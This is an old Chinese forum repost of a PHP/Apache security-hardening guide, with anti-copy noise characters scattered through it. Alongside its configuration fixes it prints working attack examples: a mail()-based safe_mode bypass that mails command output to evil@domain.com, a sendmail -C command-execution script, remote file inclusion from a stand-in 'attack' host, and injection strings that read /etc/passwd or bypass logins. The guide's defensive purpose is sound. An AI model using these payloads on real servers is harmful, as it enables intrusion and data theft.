找回密码
 注册
查看: 4709|回复: 0

[转载]PHP安全配置

[复制链接]
发表于 2004-5-31 00:03:08 | 显示全部楼层 |阅读模式
一、Web服务器安全
5 V  I7 ?, S. h- }, `% k& I, b9 B9 _3 Z0 Z
PHP其实不过是Web服务器的一个模块功能,所以首先要保证Web服务器的安全。当然Web服务器要安全又必须是先保证系统安全,这样就扯远了,无穷无尽。PHP可以和各种Web服务器结合,这里也只讨论Apache。非常建议以chroot方式安装启动Apache,这样即使Apache和PHP及其脚本出现漏洞,受影响的也只有这个禁锢的系统,不会危害实际系统。但是使用chroot的Apache后,给应用也会带来一定的麻烦,比如连接mysql时必须用127.0.0.1地址使用tcp连接而不能用localhost实现socket连接,这在效率上会稍微差一点。还有mail函数发送邮件也是个问题,因为php.ini里的:
3 u/ J" {5 g8 I+ I9 `  t# t3 w
% n# f! p0 ?# V& E) g[mail function]
6 |( k( H4 K* |1 U8 r7 M2 q2 G, X; For Win32 only.9 [' e- V5 O  m. ~* }: C
SMTP = localhost0 A* ^; c( Z; m% j$ s! B2 k: u

1 A! @' w# z6 @7 a5 |6 E; For Win32 only.# S9 ~0 B; c3 d" v+ }
sendmail_from = me@localhost.com
7 ~. H  d# i  G: ]  ^
1 N+ W' @6 B- z4 A8 e* |都是针对Win32平台,所以需要在chroot环境下调整好sendmail。
8 g) g# w- ^" K- n8 X
5 J8 \9 f: B. i! ^" p  H二、PHP本身问题
. H8 ~9 @2 Z2 u* x3 @7 L8 Y( L" P
  S1 N! n) j) j. C' B8 v1、远程溢出% F1 C  P4 w* J/ _
8 [" N+ i6 F( q
PHP-4.1.2以下的所有版本都存在文件上传远程缓冲区溢出漏洞,而且攻击程序已经广泛流传,成功率非常高:
. ?7 l( \- Q1 L0 ~" |% |5 a% _. M( P, i. c4 `8 C( g
http://packetstormsecurity.org/0204-exploits/7350fun
- C% v, Z- {4 ^0 ?http://hsj.shadowpenguin.org/misc/php3018_exp.txt' J1 i& r, H7 r: R

" u" v1 z; h+ ]( x% O# @2、远程拒绝服务" W0 {/ _9 v% W3 a  k6 Z* j: |2 O  P

# t$ {4 d$ P: ?PHP-4.2.0和PHP-4.2.1存在PHP multipart/form-data POST请求处理远程漏洞,虽然不能获得本地用户权限,但是也能造成拒绝服务。( t8 o9 B4 M3 ^8 y

5 a5 R3 w. {# B5 B* c8 X, B5 j/ T3、safe_mode绕过漏洞% [- m5 \, V" ~' z7 P
1 t! T; N2 T: e8 K8 m
还有PHP-4.2.2以下到PHP-4.0.5版本都存在PHP mail函数绕过safe_mode限制执行命令漏洞,4.0.5版本开始mail函数增加了第五个参数,由于设计者考虑不周可以突破safe_mode的限制执行命令。其中4.0.5版本突破非常简单,只需用分号隔开后面加shell命令就可以了,比如存在PHP脚本evil.php:
, k+ S# l+ L" Q7 g* J
% C1 X6 l( V3 m/ N; f<? mail("foo@bar,"foo","bar","",$bar); ?>
2 g7 o2 O1 B0 G
2 g" A$ @$ R2 M$ I+ u执行如下的URL:
0 U9 b+ Q6 i5 d2 I2 l2 _8 n# C5 d. J! F* k/ z# ^/ k
http://foo.com/evil.php?bar=;/usr/bin/id|mail evil@domain.com
* l- o9 V  |) C: B
. P& N2 l1 a/ r. O! ?! M这将id执行的结果发送给evil@domain.com。
6 \$ s, p2 ^3 P* r, ?
: K" C3 d! H' f& T/ h; @对于4.0.6至4.2.2的PHP突破safe_mode限制其实是利用了sendmail的-C参数,所以系统必须是使用sendmail。如下的代码能够突破safe_mode限制执行命令:
, v9 }7 c% b) A, R2 S
0 K' P9 b+ V& b0 S- L5 E<?
" _6 P+ o4 W6 u) m# 注意,下面这两个必须是不存在的,或者它们的属主和本脚本的属主是一样/ a5 T$ d& t4 J  M  @
$script="/tmp/script123";
( g. H8 }) r! g8 N% L7 o6 A7 `$cf="/tmp/cf123";
5 M6 |/ v( D, k& U! V" |' g
" a2 w% n1 f% v7 |; C4 [; G. ]* C$fd = fopen($cf, "w");
0 }/ y- U7 d2 {9 ?, r3 |2 Ofwrite($fd, "OQ/tmp
0 C3 s+ P. G& i4 J% L% PSparse=0
6 p. @7 k; q% |* B/ Z! qR$*" . chr(9) . "$#local $@ $1 $: $1; _$ m; a+ F7 `4 V' c
Mlocal, P=/bin/sh, A=sh $script");
: j8 u! F5 ^* T; ~4 Ffclose($fd);8 a9 d; w4 W2 T* O: {2 }
7 y4 R1 y# L2 @; E' W1 @
$fd = fopen($script, "w");* O) z# I2 X* r2 f2 a: C0 {
fwrite($fd, "rm -f $script $cf; ");! T' F! L; U/ I+ u* p) H0 b) B: f! o0 p
fwrite($fd, $cmd);! R. ]! ?4 c/ Y9 ^' S, ~5 D5 ]% I
fclose($fd);
+ ^1 ~: g- J; @3 f8 s6 q6 e0 z# \8 I
mail("nobody", "", "", "", "-C$cf");4 ?1 B5 \* R2 i* ], p4 }/ v
?>" J9 g+ u7 T- K. w+ j/ ]* j

6 e3 P  i( j+ M) S+ a, X8 o1 K0 [- J' k还是使用以上有问题版本PHP的用户一定要及时升级到最新版本,这样才能消除基本的安全问题。- k3 W, k8 u& {; s; F$ \, V
8 a$ W4 B& X5 f+ w7 m3 q4 H+ g
三、PHP本身的安全配置& c/ h' T/ o2 {& J9 B6 D7 x

: u9 k# E% c7 c$ RPHP的配置非常灵活,可以通过php.ini, httpd.conf, .htaccess文件(该目录必须设置了AllowOverride All或Options)进行设置,还可以在脚本程序里使用ini_set()及其他的特定的函数进行设置。通过phpinfo()和get_cfg_var()函数可以得到配置选项的各个值。/ t$ D) X9 J5 N+ p2 q9 L
: g9 V3 f% d! [/ S
如果配置选项是唯一PHP_INI_SYSTEM属性的,必须通过php.ini和httpd.conf来修改,它们修改的是PHP的Master值,但修改之后必须重启apache才能生效。其中php.ini设置的选项是对Web服务器所有脚本生效,httpd.conf里设置的选项是对该定义的目录下所有脚本生效。
& C& u0 i% _$ D. z# q- f* i& f
$ S6 i9 c( R4 m: N+ r0 F/ f4 G' b如果还有其他的PHP_INI_USER,  PHP_INI_PERDIR, PHP_INI_ALL属性的选项就可以使用.htaccess文件设置,也可以通过在脚本程序自身用ini_set()函数设定,它们修改的是Local值,改了以后马上生效。但是.htaccess只对当前目录的脚本程序生效,ini_set()函数只对该脚本程序设置ini_set()函数以后的代码生效。各个版本的选项属性可能不尽相同,可以用如下命令查找当前源代码的main.c文件得到所有的选项,以及它的属性:
5 }4 F: `( G: x" ^
+ @/ H+ y5 B1 o- h9 x( ]# grep PHP_INI_ /PHP_SRC/main/main.c6 b: |2 v8 Y" O5 c. z) H9 ?$ `
% P" X0 C6 y  k% g$ H8 f
在讨论PHP安全配置之前,应该好好了解PHP的safe_mode模式。
9 U+ E* i1 j0 F4 g4 \" t  A7 ^4 |: u) I5 g) g& e0 |
1、safe_mode
1 U! l7 g$ F+ \) v
) g  y( p4 m. B/ k' {1 p) S: q# {safe_mode是唯一PHP_INI_SYSTEM属性,必须通过php.ini或httpd.conf来设置。要启用safe_mode,只需修改php.ini:
+ T( C. I3 ~; M" D. V
' g6 J6 @6 @; ?0 V& H4 lsafe_mode = On
4 ^3 ]; b; s% W  a1 a% r9 d
. y3 ~4 G2 C/ D+ W% w或者修改httpd.conf,定义目录:
3 O, [) ]- d4 ]: \% A
: }% d. v4 A8 ~1 E" g<Directory /var/www>
; {4 j5 r; _6 n; P' n1 F, b   Options FollowSymLinks" {& n' D7 v- f$ i
   php_admin_value safe_mode 1
: K/ ?+ X) c* ?( X  B</Directory>
  O$ i1 R5 Z8 C
6 U7 S6 E1 e, |; I4 h& N2 k重启apache后safe_mode就生效了。启动safe_mode,会对许多PHP函数进行限制,特别是和系统相关的文件打开、命令执行等函数。
4 _6 [9 f. M9 `6 T所有操作文件的函数将只能操作与脚本UID相同的文件,比如test.php脚本的内容为:+ G2 ]& y* l3 p  ~) e8 P9 q. q

: G1 h! S* N% C. c$ M' y<?include("index.html")?>5 V2 i; X# {" J  P
% S# |: z, X9 u' {* R/ N
几个文件的属性如下:* c: }4 N$ ?0 o4 J; U
( Q- J; P7 X6 ?0 z/ d6 _
# ls -la9 ?! n5 j* y# l/ S! @$ h
total 136 ]6 b1 J3 E0 u9 h3 s
drwxr-xr-x    2 root     root          104 Jul 20 01:25 .3 m9 O) x  M* i1 U9 w, Y
drwxr-xr-x   16 root     root          384 Jul 18 12:02 ..( R$ P8 w5 _4 v5 V, `" Z
-rw-r--r--    1 root     root         4110 Oct 26  2002 index.html2 B/ ~, x, p) o/ {3 q/ C4 j
-rw-r--r--    1 www-data www-data       41 Jul 19 19:14 test.php
" `5 Y  X/ x# P8 k" e0 A( y( i4 b; i6 e# N5 J  j, q) Z
在浏览器请求test.php会提示如下的错误信息:' ]: j9 u- X; ?3 H# f; B9 ?; ~% e$ o* J4 ?

2 @& M7 C2 E& x% r4 I/ aWarning: SAFE MODE Restriction in effect. The script whose uid/gid is 33/33 is not allowed to access ./index.html owned by uid/gid 0/0 in /var/www/test.php on line 1" r8 ]9 J) F/ C* ~

  s* o! _2 {2 W- r如果被操作文件所在目录的UID和脚本UID一致,那么该文件的UID即使和脚本不同也可以访问的,不知这是否是PHP的一个漏洞还是另有隐情。所以php脚本属主这个用户最好就只作这个用途,绝对禁止使用root做为php脚本的属主,这样就达不到safe_mode的效果了。5 B* h- }( }! U) D5 h: e' u
3 J6 O3 o3 y) s1 z( w; R5 S2 v0 `' S
如果想将其放宽到GID比较,则打开 safe_mode_gid可以考虑只比较文件的GID,可以设置如下选项:
9 }) a- {" z4 p5 M0 \2 v% W$ s8 S; }" \* ?0 |
safe_mode_gid = On- Q4 v5 b  ?3 W' l
/ q+ E/ W+ X, ~9 ]& T
设置了safe_mode以后,所有命令执行的函数将被限制只能执行php.ini里safe_mode_exec_dir指定目录里的程序,而且shell_exec、`ls -l`这种执行命令的方式会被禁止。如果确实需要调用其它程序,可以在php.ini做如下设置:
, H' b3 |( ?6 i' w: ^  ~9 `6 k  c2 |4 ?
safe_mode_exec_dir = /usr/local/php/exec6 r5 }1 k% p- J3 s; _

& X; O2 i3 s* S( S% v3 X3 i然后拷贝程序到该目录,那么php脚本就可以用system等函数来执行该程序。而且该目录里的shell脚本还是可以调用其它目录里的系统命令。
9 u0 |( e& j" A% }! R/ e
, Q; @9 q. w" m8 ~7 \8 Qsafe_mode_include_dir string1 T" m8 u* }9 Z! F( y) e
当从此目录及其子目录(目录必须在 include_path 中或者用完整路径来包含)包含文件时越过 UID/GID 检查。
2 A7 G3 U1 [' E# i# d2 S* \- n3 b0 p8 K
从 PHP 4.2.0 开始,本指令可以接受和 include_path 指令类似的风格用分号隔开的路径,而不只是一个目录。
" a( h; |5 z+ O9 y# }' d6 r: ?; i4 @7 g) |) h
指定的限制实际上是一个前缀,而非一个目录名。这也就是说“safe_mode_include_dir = /dir/incl”将允许访问“/dir/include”和“/dir/incls”,如果它们存在。如果您希望将访问控制在一个指定的目录,那么请在结尾加上一个斜线,例如:“safe_mode_include_dir = /dir/incl/”。 8 f! ?; }9 B* [' T

& }, j0 L& _+ l/ u: A. Nsafe_mode_allowed_env_vars string/ O2 U2 o$ _2 A
设置某些环境变量可能是潜在的安全缺口。本指令包含有一个逗号分隔的前缀列表。在安全模式下,用户只能改变那些名字具有在这里提供的前缀的环境变量。默认情况下,用户只能设置以 PHP_ 开头的环境变量(例如 PHP_FOO = BAR)。
6 ^% e, @, @8 c; O* i- _" E
1 E& J0 a9 V( T6 G/ g: c注: 如果本指令为空,PHP 将使用户可以修改任何环境变量!
+ R2 {" V0 ~' W  E+ W
$ R# b- q1 J4 l, S$ C6 y( dsafe_mode_protected_env_vars string
3 n' q6 t( C3 ^* [* g本指令包含有一个逗号分隔的环境变量的列表,最终用户不能用 putenv() 来改变这些环境变量。甚至在 safe_mode_allowed_env_vars 中设置了允许修改时也不能改变这些变量。
% H0 T3 n, g5 {, T. ?6 V5 K
& [0 V* e" S- h虽然safe_mode不是万能的(低版本的PHP可以绕过),但还是强烈建议打开安全模式,在一定程度上能够避免一些未知的攻击。不过启用safe_mode会有很多限制,可能对应用带来影响,所以还需要调整代码和配置才能和谐。被安全模式限制或屏蔽的函数可以参考PHP手册。
& S1 s4 V, N" ]+ X6 V- w# h  s" |4 t: d5 M1 i# s/ a+ W8 c
讨论完safe_mode后,下面结合程序代码实际可能出现的问题讨论如何通过对PHP服务器端的配置来避免出现的漏洞。% n7 l' b, @1 f& ~8 C$ e- s8 h

' v) t8 i9 F0 S2、变量滥用
, t0 J- K1 |' ?  @8 Y1 A" [; _4 {  R" }& E3 W6 N
PHP默认register_globals = On,对于GET, POST, Cookie, Environment, Session的变量可以直接注册成全局变量。它们的注册顺序是variables_order = "EGPCS"(可以通过php.ini修改),同名变量variables_order右边的覆盖左边,所以变量的滥用极易造成程序的混乱。而且脚本程序员往往没有对变量初始化的习惯,像如下的程序片断就极易受到攻击:( E/ N) Q9 Q3 C- l8 J
" S2 P/ y2 }9 ^
<?
8 q3 i; i  w7 |//test_1.php
. z0 m! \# j0 X( i
4 X1 p% K4 Q& l: k: ~5 wif ($pass == "hello")
( s4 G' S% \+ A5 ?    $auth = 1;% H( a7 p* r& d) a
+ N) d+ Y) S  L0 l3 s+ `' u& B
if ($auth == 1)
" K$ \' q) g) W. |' `    echo "some important information";
9 v/ x: P5 i# R5 \else3 Q+ y3 V) N5 T
    echo "nothing";
0 H* {5 {# h# X  A- o?>3 k( l( ^$ z8 e3 j( W5 R
  M9 R" Z2 x- [5 Q
攻击者只需用如下的请求就能绕过检查:; |0 _2 q- o# {
http://victim/test_1.php?auth=1
# o0 P; ~$ D% ~5 o/ ?5 y' s. W8 ?, e* h
这虽然是一个很弱智的错误,但一些著名的程序也有犯过这种错误,比如phpnuke的远程文件拷贝漏洞:http://www.securityfocus.com/bid/3361
! i9 N* b$ J7 m, g! F1 R; p4 v- J
PHP-4.1.0发布的时候建议关闭register_globals,并提供了7个特殊的数组变量来使用各种变量。对于从GET、POST、COOKIE等来的变量并不会直接注册成变量,必需通过数组变量来存取。PHP-4.2.0发布的时候,php.ini默认配置就是register_globals = Off。这使得程序使用PHP自身初始化的默认值,一般为0,避免了攻击者控制判断变量。
3 y1 Z8 O+ b. ^) V/ q( H7 K1 i# H7 j, t
解决方法:
/ Z' E- h9 K% N) u9 [6 r, @5 o9 G1 u- U# t$ F! f9 {
配置文件php.ini设置register_globals = Off。) w9 c  E- }/ t- r- V1 ]
0 c, F" q; x+ }1 M
要求程序员对作为判断的变量在程序最开始初始化一个值。' m( y7 s* t. z( i; V( \' b

% y% E2 s0 d' o' ^* g. i$ L( {3、文件打开6 g9 n/ j: ~/ B4 b/ N# D8 c9 T0 k: Q2 ~
4 o9 |$ c6 I* V3 }3 I
极易受攻击的代码片断:
& k. V2 D" \$ u- b% j
0 V$ T5 o8 y- [# y0 _<?
4 A, ?/ y7 p# z* C5 r7 Y//test_2.php
& K  e9 [* f) n& {/ U
9 l$ a- J& C7 H" Y: G' d8 |5 lif (!($str = readfile("$filename"))) {+ p9 d& V# ?6 J/ O' C! f9 B7 \
    echo("Could not open file: $filename<BR>\n");( g% I( O& v+ K6 q2 O
    exit;
) h1 o' Y/ H* a( O, ^2 ?}
# W' F9 x! u4 U% J8 delse {
* p  u# V7 j3 h1 _    echo $str;
# M8 r5 x; ~  W, Y8 W; ?}
7 S6 Y. I$ ]! z9 r, z. x( M?>
; C, b7 x" v& l, T9 H
5 M0 o4 E0 s. W( |1 L( s由于攻击者可以指定任意的$filename,攻击者用如下的请求就可以看到/etc/passwd:
* A+ f& N) v; W2 G' @2 ?2 U
2 S1 e3 c0 e7 I/ Shttp://victim/test_2.php?filename=/etc/passwd
/ o! ~+ l! O# [+ Y6 E# v) {4 M2 r( y5 [. [
如下请求可以读php文件本身:7 V8 @+ v  i7 `8 |7 @! N
7 w3 p# `( w- p. a& |
http://victim/test_2.php?filename=test_2.php. X3 P8 w; x% \! p8 Q- t
( q* o8 C$ g! g
PHP中文件打开函数还有fopen(), file()等,如果对文件名变量检查不严就会造成服务器重要文件被访问读取。9 C" b. q) _7 a' A, w
& C# ]* T* Y2 z6 A0 v+ B
解决方法:
9 C; e+ Q8 ]/ s$ f
  |5 M, g! ?6 W$ J% \* q如非特殊需要,把php的文件操作限制在web目录里面。以下是修改apache配置文件httpd.conf的一个例子:: u1 U3 X) I; X$ ]
- H( w# u5 U4 N5 o5 k( o( f
<Directory /usr/local/apache/htdocs>
; y( A/ G0 d& l# Y* u* R  ?    php_admin_value open_basedir /usr/local/apache/htdocs
; X' c0 }: B# U5 n" W</Directory>' m, d3 h1 v, F# B
" P! U7 q( R8 w3 j  m! L  e
重启apache后,/usr/local/apache/htdocs目录下的PHP脚本就只能操作它自己目录下的文件了,否则PHP就会报错:
* F1 I4 w6 M* E% e- K! `" \  o7 ^( t: R; y
Warning: open_basedir restriction in effect. File is in wrong directory in xxx on line xx.
- V9 ~/ `7 `/ n. f/ y& O; ~0 R( Q9 @; F# f3 _0 _# y" N0 z
使用safe_mode模式也能避免这种问题,前面已经讨论过了。
5 `$ C4 ^3 S7 M. V9 U, v
+ @# `0 Q# Q5 ]4、包含文件  a7 t& H3 d. d

/ r# P5 C" Z  q2 U2 |: R3 K极易受攻击的代码片断:+ G4 s3 r8 H5 y- F2 x
) C% Q2 y* _5 [6 j
<?0 t! l, j/ r7 }/ ?6 q
//test_3.php1 L+ c2 F- y( _
$ B7 L5 h" b+ s$ \1 m: P
if(file_exists($filename))
. D- G- T: S4 Q9 @+ {; _    include("$filename");2 R7 z3 s/ {6 t/ e# i9 E! t
?>
* i% Q; ?/ S8 e' G) f. c( w. {; ~/ x: x0 Q4 t
这种不负责任的代码会造成相当大的危害,攻击者用如下请求可以得到/etc/passwd文件:
2 v* m. B2 S+ O: @
' ~! R0 n. C& `4 i' vhttp://victim/test_3.php?filename=/etc/passwd" m' Z* X. X$ ?1 W
7 r: S/ \( S- a# ]) @8 `- a
如果对于Unix版的PHP(Win版的PHP不支持远程打开文件)攻击者可以在自己开了http或ftp服务的机器上建立一个包含shell命令的文件,如http://attack/attack.txt的内容是<?passthru("ls /etc")?>,那么如下的请求就可以在目标主机执行命令ls /etc:8 ~3 I! f6 q- C. Q! j$ M6 x1 Z
# m0 k- |$ Q0 X4 u7 F( v+ ^
http://victim/test_3.php?filename=http://attack/attack.txt
, A* m1 _0 D: f- R8 V$ H) G/ g' E
9 }9 c$ W' Y" d1 B" p% W% l) B攻击者甚至可以通过包含apache的日志文件access.log和error.log来得到执行命令的代码,不过由于干扰信息太多,有时不易成功。
1 o8 o  m! l: O% G2 c对于另外一种形式,如下代码片断:
) k' }3 U/ L  r
# b. ?6 t1 e; H  b<?3 g1 }3 R; N, ^/ F4 M( n. \
//test_4.php. c- z1 A+ e& E1 e& L, d0 U& e
5 q9 u; A7 j2 i- t) f  k/ e
include("$lib/config.php");
7 h; r# O) U7 R' u4 R& _3 x% T?>
! ?$ v3 X7 @& ]  i
# W* Z% ]) C( G' N" Q攻击者可以在自己的主机建立一个包含执行命令代码的config.php文件,然后用如下请求也可以在目标主机执行命令:1 E& I. r5 n. f4 N: n
+ ]+ ]$ n- O4 d4 ~5 q& y' {
http://victim/test_4.php?lib=http://attack
5 M! P$ h" v( a9 g% T& E8 b7 A1 y: x8 ]
PHP的包含函数有include(), include_once(), require(), require_once。如果对包含文件名变量检查不严就会对系统造成严重危险,可以远程执行命令。- J( t$ B% c" Y3 O4 p: b( @- }1 T
! @5 s6 e* w( W% [
解决方法:
3 P& R4 V, C. _" G9 v6 B
7 o/ s) J) ]8 M. K要求程序员包含文件里的参数尽量不要使用变量,如果使用变量,就一定要严格检查要包含的文件名,绝对不能由用户任意指定。9 c" `( G2 W- }  \
* z/ `1 D1 ]* |  i
如前面文件打开中限制PHP操作路径是一个必要的选项。另外,如非特殊需要,一定要关闭PHP的远程文件打开功能。修改php.ini文件:
1 r/ F9 T; e: i6 f* m2 l* f  {' I2 Q5 j. k
allow_url_fopen = Off# T" F$ Y5 Z- \) I
7 D! s, {. L: v; s' K; M
重启apache。
6 n$ S0 J- n" m' W- M% `8 R2 [
% F0 U, `. v3 K% V% @) K. i6 g5、文件上传6 B0 |1 k1 _( g
- ^! M$ J7 r/ O2 X6 S; \
php的文件上传机制是把用户上传的文件保存在php.ini的upload_tmp_dir定义的临时目录(默认是系统的临时目录,如:/tmp)里的一个类似phpxXuoXG的随机临时文件,程序执行结束,该临时文件也被删除。PHP给上传的文件定义了四个变量:(如form变量名是file,而且register_globals打开)" S4 x9 n7 u3 I# t9 P9 G* B" B  D5 q
1 |5 t& T* F4 d$ ^% L& o! b, X) V
$file        #就是保存到服务器端的临时文件(如/tmp/phpxXuoXG ), I1 a" \: B5 P) U
$file_size    #上传文件的大小
# a: h0 C& m* V3 |; d$file_name    #上传文件的原始名称3 a7 j0 D1 X% R
$file_type    #上传文件的类型
' p6 }2 D; m( v& g8 }# i. C  {3 O+ R5 _
推荐使用:0 E# J8 H: W" \( F
3 E0 ~, x4 u' a& [
$HTTP_POST_FILES['file']['tmp_name']
* ]1 \5 t1 w1 T/ a+ d, u. J$HTTP_POST_FILES['file']['size'] # |  a( r. P% G( A
$HTTP_POST_FILES['file']['name'] ! ^8 [. L- p1 v. }0 m0 v" j: \
$HTTP_POST_FILES['file']['type']- S2 W! H: n& n7 d$ z  }2 E

% v" Z* L7 X6 f1 e7 B这是一个最简单的文件上传代码:
0 ]! t3 R( \' V1 i5 E8 V" t1 p4 Y- p' m( R. v/ ]
<?! r( e1 \* P& h
//test_5.php
+ J- W) J  S" [& q/ s" U0 |; \
8 \7 Q6 I) p- y2 r% r4 @% ~8 z3 J* Pif(isset($upload) && $file != "none") {
3 r% [: S7 P0 a$ [    copy($file, "/usr/local/apache/htdocs/upload/".$file_name);8 |; s$ J$ k$ A/ q/ @/ T. Q
    echo "文件".$file_name."上传成功!点击<a href=\"$PHP_SELF\">继续上传</a>";
' y( Q$ h' Y5 ]$ q8 ?2 z    exit;% a4 P9 p4 _2 L0 y( R: t5 h
}( l7 \9 G! Y6 Q
?>" X# a6 \% p9 p) n' c; C
<html>! k! s2 u: B9 O1 z. l3 D5 P
<head>
: Q& P1 d% Y4 e. T  P, k<title>文件上传</title>. {& S9 ~: m1 l- H8 q% r
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">: R- U6 Y+ x2 V! g
</head># O6 P1 @% v: @+ H  Y
<body bgcolor="#FFFFFF">
1 n5 ~  P1 y2 a8 i0 p! t: u1 H<form enctype="multipart/form-data" method="post">9 |+ m. S  ^0 G' E
上传文件:
# U  p: v8 \* T* j# `2 V3 B; Z5 d<input type="file"  name="file" size="30">
( o' a0 m6 j9 S+ b$ p, Y<input type="submit" name="upload" value="上传">& ]7 G4 l% a+ p8 f! q8 e+ U
</form>- N3 b  r& ]; @0 H( m
</body>) j3 J6 ~( L% @5 W
</html>
9 [0 X' E3 \# F" @4 N- U" W) @' |6 G6 r0 A
这样的上传代码存在读取任意文件和执行命令的重大问题。
( S5 t" _6 ]. H  N下面的请求可以把/etc/passwd文档拷贝到web目录/usr/local/apache/htdocs/test(注意:这个目录必须nobody可写)下的attack.txt文件里:* _9 V# Q8 Z7 X/ o

, {1 \: R: f' S9 W6 M- @http://victim/test_5.php?upload= ... ile_name=attack.txt
$ v$ E1 i8 e& l& Q  A0 ]$ }8 v/ e) P# e2 z
! K2 ]7 Z3 R8 f然后可以用如下请求读取口令文件:! d1 I9 d! J8 ^3 n

' E2 ~: G6 x+ R+ s0 r1 b% _, bhttp://victim/test/attack.txt
2 B% a9 s. ?) n/ @* ]7 M* R* V5 X. t# B! x0 U# I3 ?- c
攻击者可以把php文件拷贝成其它扩展名,泄漏脚本源代码。
6 @% n$ D- P; X# `攻击者可以自定义form里file_name变量的值,上传覆盖任意有写权限的文件。
7 o' w+ `/ G( J$ R+ D攻击者还可以上传PHP脚本执行主机的命令。, k# g: V4 K  z* ~
: {  _. \/ I9 B
解决方法:
' H; s6 t. o1 f4 U  V1 a3 N# [$ U. t" w% |
PHP-4.0.3以后提供了is_uploaded_file和move_uploaded_file函数,可以检查操作的文件是否是用户上传的文件,从而避免把系统文件拷贝到web目录。* Y7 i+ j. A* n' @. ?6 H% o
使用$HTTP_POST_FILES数组来读取用户上传的文件变量。4 z' R  y9 q0 |. N
严格检查上传变量。比如不允许是php脚本文件。
: d" R# t1 b6 z% X4 @; h. V' K0 h/ `2 f% `' _# u# k
把PHP脚本操作限制在web目录可以避免程序员使用copy函数把系统文件拷贝到web目录。move_uploaded_file不受open_basedir的限制,所以不必修改php.ini里upload_tmp_dir的值。
9 M9 B+ l% t" h7 b6 v3 t' ?. p) z把PHP脚本用phpencode进行加密,避免由于copy操作泄漏源码。
2 U9 w# ]( i- q严格配置文件和目录的权限,只允许上传的目录能够让nobody用户可写。
! Q  ]: M  h4 [0 ^5 S: [( x2 g对于上传目录去掉PHP解释功能,可以通过修改httpd.conf实现:/ o9 j# q0 I0 \; M7 [& H/ L' ~
& H8 u% s# z6 P" j  h# r3 q
<Directory /usr/local/apache/htdocs/upload>
& @9 W3 Y0 }+ \1 k% k+ Q1 R' ]      php_flag engine off2 s$ b8 t, c7 q3 }3 B4 e
      #如果是php3换成php3_engine off
4 T1 R* t8 M1 t  K  ~! ^6 y</Directory># o$ W9 |6 y9 ^6 P
- t, F; I# \7 g
重启apache,upload目录的php文件就不能被apache解释了,即使上传了php文件也没有问题,只能直接显示源码。: Y  `5 y9 R# i* [7 ?4 X- F% {1 d+ h

7 z; W0 `5 Z& k3 g' I% e% g" q6、命令执行9 N$ c7 _! F' W5 j4 e

. E0 d1 [7 n5 h( n下面的代码片断是从PHPNetToolpack摘出,详细的描述见:0 }7 w3 f! I- f7 Q( g8 w; e

* L- T% o( e( F0 b3 f0 G$ lhttp://www.securityfocus.com/bid/4303* b9 W/ `( m! F3 F, s
' c. c2 H) |2 T0 f- {/ Z" ?
<?
+ y7 ?1 C: a( j4 t' p0 N//test_6.php
# ^: {- ^/ E$ |  ^
! P2 K& n1 j1 T: M+ Psystem("traceroute $a_query",$ret_strs);# \. y% e8 I. K
?>
  i, [& K- i0 ?* R; N/ _9 m: z- @% E( X* s" o
由于程序没有过滤$a_query变量,所以攻击者可以用分号来追加执行命令。
0 _( V  _4 t, Y( ]1 y4 s) K. ?9 \" J* c/ r$ A! Y
攻击者输入如下请求可以执行cat /etc/passwd命令:/ O2 _9 J! n! l: z1 R

. l% Z; z6 h) D& Y" Dhttp://victim/test_6.php?a_query=www.example.com;cat /etc/passwd 1 F; Z- o  Z8 x# E+ v% w

+ s1 m/ ^5 Q$ i+ C! J, \  ePHP的命令执行函数还有system(), passthru(), popen()和``等。命令执行函数非常危险,慎用。如果要使用一定要严格检查用户输入。! G6 w! S! D: ^# ]

" I6 U8 F; x1 E4 D+ f解决方法:
; R& O! G: s; l/ ]& U: |- A3 V8 F1 i. c( J
要求程序员使用escapeshellcmd()函数过滤用户输入的shell命令。( \7 s5 K) b. M' W  u4 a1 f" j8 Q( w- m' X
& C# D) `* J  h
启用safe_mode可以杜绝很多执行命令的问题,不过要注意PHP的版本一定要是最新的,小于PHP-4.2.2的都可能绕过safe_mode的限制去执行命令。
- I! G* \4 U9 b2 F5 ]# s/ r+ f% S- }2 J4 x: b/ B
7、sql_inject3 p0 a3 P! r5 v. _6 s0 F8 \

  p& r$ o& D8 |% U+ {* y  x如下的SQL语句如果未对变量进行处理就会存在问题:' N9 Z0 q! r% P: ?
/ w, {4 Q% ^1 ^; \' J! d% T
select * from login where user='$user' and pass='$pass'8 A) \3 B' O; v: j( x
9 U- r! M; }" R
攻击者可以用户名和口令都输入1' or 1='1绕过验证。9 T/ A3 W5 Z% ^* V
' T& F( i, n4 o# \/ F
不过幸亏PHP有一个默认的选项magic_quotes_gpc = On,该选项使得从GET, POST, COOKIE来的变量自动加了addslashes()操作。上面SQL语句变成了:
, T) j/ E( [' m# r% P3 v8 A" F7 w0 L
select * from login where user='1\' or 1=\'1' and pass='1\' or 1=\'1'8 H- C& T5 s0 `' P

+ G* m; w4 v, i! U2 Q6 W% ?从而避免了此类sql_inject攻击。
" Y5 C/ W; E( J4 b# H
( b! n# ?3 L- q$ y7 M对于数字类型的字段,很多程序员会这样写:
3 y# G3 w% u8 t6 s" D* v! t1 m5 N8 d2 E2 u0 m
select * from test where id=$id
% _3 y4 h# P$ \' G3 I* w0 l& _# |: s  ^6 N6 z. Q7 _
由于变量没有用单引号扩起来,就会造成sql_inject攻击。幸亏MySQL功能简单,没有sqlserver等数据库有执行命令的SQL语句,而且PHP的mysql_query()函数也只允许执行一条SQL语句,所以用分号隔开多条SQL语句的攻击也不能奏效。但是攻击者起码还可以让查询语句出错,泄漏系统的一些信息,或者一些意想不到的情况。6 i8 u5 y6 A6 q- |, G
3 W' Q6 ?0 B1 `  }
解决方法:
0 [0 J; S3 h- g( W* J* O5 S$ o5 x
+ l4 e  n# {6 Z' ?7 N# [要求程序员对所有用户提交的要放到SQL语句的变量进行过滤。2 o& W# v8 s& S! W' x
即使是数字类型的字段,变量也要用单引号扩起来,MySQL自己会把字串处理成数字。8 w) v$ U7 \) b0 V7 X) S5 i# G
在MySQL里不要给PHP程序高级别权限的用户,只允许对自己的库进行操作,这也避免了程序出现问题被 SELECT INTO OUTFILE ... 这种攻击。9 v5 r+ Z: g1 M3 K# t$ Y( a/ X
' `( k; @5 P" C* S" _3 H
8、警告及错误信息- y) F7 a3 U" N) O/ X

: H! N* q3 M. n9 tPHP默认显示所有的警告及错误信息:
( q' N, G( M; b/ ^
# y" B& ]7 I  |0 [8 y9 werror_reporting  =  E_ALL & ~E_NOTICE( U1 {0 F* T. ~0 g. J
display_errors = On$ e  d  y7 o+ t' n: g
